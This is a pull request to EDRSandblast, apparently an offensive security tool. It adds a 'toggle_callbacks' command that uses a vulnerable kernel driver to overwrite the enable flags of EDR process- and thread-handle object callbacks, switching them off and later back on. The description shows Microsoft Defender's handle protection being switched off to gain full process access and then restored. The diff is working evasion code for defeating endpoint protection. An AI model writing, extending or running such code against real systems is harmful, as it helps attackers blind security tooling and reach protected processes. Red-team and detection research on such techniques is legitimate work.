### PR TITLE
add toggle_callbacks support

### DIFF
--- a/EDRSandblast/Includes/ObjectCallbacks.h
+++ b/EDRSandblast/Includes/ObjectCallbacks.h
@@ -19,7 +19,7 @@ BOOL AreProcessAndThreadsObjectsCallbacksSupportEnabled();
 
 //undoc struct strategy
 void EnumAllObjectsCallbacks();
-BOOL EnumEDRProcessAndThreadObjectsCallbacks(struct FOUND_EDR_CALLBACKS* FoundObjectCallbacks);
+BOOL EnumEDRProcessAndThreadObjectsCallbacks(struct FOUND_EDR_CALLBACKS* FoundObjectCallbacks, BOOL includeDisabled);
 void EnableEDRProcessAndThreadObjectsCallbacks(struct FOUND_EDR_CALLBACKS* FoundObjectCallbacks);
 void DisableEDRProcessAndThreadObjectsCallbacks(struct FOUND_EDR_CALLBACKS* FoundObjectCallbacks);
 void EnableDisableAllProcessAndThreadObjectsCallbacks(BOOL enable);

--- a/EDRSandblast/KernellandBypass/ObjectCallbacks.c
+++ b/EDRSandblast/KernellandBypass/ObjectCallbacks.c
@@ -306,7 +306,7 @@ void EnableDisableEDRProcessAndThreadObjectsCallbacks(struct FOUND_EDR_CALLBACKS
             if (callbackAddress) {
                 DWORD64 driverOffset = 0;
                 FindDriverName(callbackAddress, &driverOffset);
-                driverOffset -= 0x14; // there seems to be a shift of 0x14 between the callback struct and the actual callback function address?
+                driverOffset -= 0x14; // &(callbackAddress) - 0x14 = &(callbackBase) <- the base is displayed before in the logs
                 _tprintf_or_not(TEXT("[+] [ObjectCallblacks]\t%s %s callback at 0x%llX ...\n"), enable ? TEXT("Enabling") : TEXT("Disabling"), cb->driver_name, driverOffset);
             }
             else {

--- a/EDRSandblast/KernellandBypass/ObjectCallbacks.c
+++ b/EDRSandblast/KernellandBypass/ObjectCallbacks.c
@@ -238,7 +238,7 @@ BOOL EnumEDRProcessAndThreadObjectsCallbacks(struct FOUND_EDR_CALLBACKS* FoundOb
                         struct KRNL_CALLBACK cb;
                         cb.type = OBJECT_CALLBACK;
                         cb.driver_name = driverNamePreOperation;
-						cb.removed = Enabled; //if Enabled --> will be removed, includeDisabled is irrelevant here
+						cb.removed = !Enabled;
                         cb.callback_func = PreOperation;
                         cb.addresses.object_callback.enable_addr = cbEntry + Offset_CALLBACK_ENTRY_ITEM_Enabled;
                         AddFoundKernelCallback(FoundObjectCallbacks, &cb);
@@ -288,7 +288,7 @@ void EnableDisableEDRProcessAndThreadObjectsCallbacks(struct FOUND_EDR_CALLBACKS
     }
     for (DWORD64 i = 0; i < FoundObjectCallbacks->size; i++) {
         struct KRNL_CALLBACK* cb = &FoundObjectCallbacks->EDR_CALLBACKS[i];
-		if (cb->type == OBJECT_CALLBACK && cb->removed != enable) { // only toggle if existing and desired state is different
+		if (cb->type == OBJECT_CALLBACK && cb->removed == enable) {
             _tprintf_or_not(TEXT("[+] [ObjectCallblacks]\t%s %s callback...\n"), enable ? TEXT("Enabling") : TEXT("Disabling"), cb->driver_name);
             WriteMemoryDWORD(cb->addresses.object_callback.enable_addr, enable ? TRUE : FALSE);
             cb->removed = !cb->removed;

--- a/EDRSandblast_CLI/EDRSandblast.c
+++ b/EDRSandblast_CLI/EDRSandblast.c
@@ -972,9 +972,10 @@ Dump options:\n\
                 _putts_or_not(TEXT("[+] Disabling all EDR callbacks..."));
                 DisableEDRProcessAndThreadObjectsCallbacks(foundEDRDrivers);
                 if (toggle_option == DISABLE_WAIT_ENABLE) {
-                    _tprintf_or_not(TEXT("\n[+] Press ENTER to enable callbacks again: "));
+                    _tprintf_or_not(TEXT("\n[+] Press ENTER to enable callbacks again:"));
+					fflush(stdout); // flush to ensure the prompt is printed before waiting for input (stupid Windows buffering...)
                     fgetc(stdin); // wait for ENTER
-                    _putts_or_not(TEXT("\n[*] Re-enabling all EDR callbacks..."));
+                    _putts_or_not(TEXT("[*] Re-enabling all EDR callbacks..."));
                     EnableEDRProcessAndThreadObjectsCallbacks(foundEDRDrivers);
 				}
             }

--- a/EDRSandblast_CLI/EDRSandblast.c
+++ b/EDRSandblast_CLI/EDRSandblast.c
@@ -972,7 +972,7 @@ Dump options:\n\
                 _putts_or_not(TEXT("[+] Disabling all EDR callbacks..."));
                 DisableEDRProcessAndThreadObjectsCallbacks(foundEDRDrivers);
                 if (toggle_option == DISABLE_WAIT_ENABLE) {
-                    _tprintf_or_not(TEXT("\n[+] Press ENTER to enable callbacks again:"));
+                    _tprintf_or_not(TEXT("\n[+] Press ENTER to enable callbacks again:\n")); // newline ensures this line is also written when redirected to a file, i.e. EDRSandblast.exe > out.txt
 					fflush(stdout); // flush to ensure the prompt is printed before waiting for input (stupid Windows buffering...)
                     fgetc(stdin); // wait for ENTER
                     _putts_or_not(TEXT("[*] Re-enabling all EDR callbacks..."));

--- a/EDRSandblast_CLI/EDRSandblast.c
+++ b/EDRSandblast_CLI/EDRSandblast.c
@@ -194,7 +194,9 @@ Dump options:\n\
     BOOL status;
     HRESULT hrStatus = S_OK;
     TCHAR currentFolderPath[MAX_PATH] = { 0 };
-    GetCurrentDirectory(_countof(currentFolderPath), currentFolderPath);
+    GetModuleFileName((HMODULE)0, currentFolderPath, _countof(currentFolderPath));
+    TCHAR* lastSlash = _tcsrchr(currentFolderPath, '\\');
+	if (lastSlash) *lastSlash = '\0'; // cut off the executable name to keep only the path
 
     if (argc < 2) {
         _tprintf_or_not(TEXT("%s"), usage);

--- a/EDRSandblast_CLI/EDRSandblast.c
+++ b/EDRSandblast_CLI/EDRSandblast.c
@@ -206,7 +206,7 @@ Dump options:\n\
     START_MODE startMode = none;
 	enum disableCallback { DISABLE, ENABLE, DISABLE_WAIT_ENTER_ENABLE, DISABLE_WAIT_TIME_ENABLE };
     enum disableCallback toggle_option;
-	int wait_time = 30; //seconds
+	int wait_time = 10; //seconds
     TCHAR driverPath[MAX_PATH] = { 0 };
     TCHAR unsignedDriverPath[MAX_PATH] = { 0 };
     TCHAR driverDefaultName[] = DEFAULT_DRIVER_FILE;
@@ -545,7 +545,7 @@ Dump options:\n\
         LPTSTR serviceNameIfAny = NULL;
         BOOL isDriverAlreadyRunning = IsDriverServiceRunning(driverPath, &serviceNameIfAny);
         if (isDriverAlreadyRunning) {
-            _putts_or_not(TEXT("[+] Vulnerable driver is already running!\n"));
+            _tprintf_or_not(TEXT("[+] Vulnerable service '%s' is already running!\n"), serviceNameIfAny);
             SetDriverServiceName(serviceNameIfAny);
         }
         else {

--- a/EDRSandblast_StaticLibrary/EDRSandblast_API.c
+++ b/EDRSandblast_StaticLibrary/EDRSandblast_API.c
@@ -319,7 +319,7 @@ EDRSB_STATUS Krnlmode_EnumAllMonitoring(_In_opt_ EDRSB_CONTEXT* ctx) {
         _putts_or_not(TEXT("[+] Check if EDR callbacks are registered on processes and threads handle creation/duplication"));
     }
 
-    foundObjectsCallbacks = EnumEDRProcessAndThreadObjectsCallbacks(foundEDRDrivers);
+    foundObjectsCallbacks = EnumEDRProcessAndThreadObjectsCallbacks(foundEDRDrivers, FALSE);
     if (ctx && foundObjectsCallbacks) {
         ctx->foundObjectCallbacks = TRUE;
     }


### PR DESCRIPTION
# New Features
* only toggle EDRProcessAndThreadObjectsCallbacks to methodically disable/restore (process handle) EDR protections
```EDRSandblast.exe toggle_callbacks 0|1|0e1|0t1 --kernelmode -i```

# Reason
* MsMpEng.exe (Windows 11 24H2, Defender for Individuals) downgrades any OpenProcess handles, even when running as PPL
  * ```h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, <pid>); h.GrantedAccess --> 0x1ff7d4``` 
<img width="3154" height="19" alt="image" src="https://github.com/user-attachments/assets/1bd04365-1a32-44b3-892b-9a54c02f4e2a" />

* but now after disabling the relevant callback we have full access
<img width="879" height="20" alt="disabled-callback" src="https://github.com/user-attachments/assets/88757782-b216-4e4a-8011-b8027122f1ad" />

* after the relevant actions are completed, the callback can be restored and Defender should work as expected
<img width="756" height="20" alt="enabled-callback" src="https://github.com/user-attachments/assets/1ba1b24a-26b0-4e68-96b5-66091f6c0f05" />
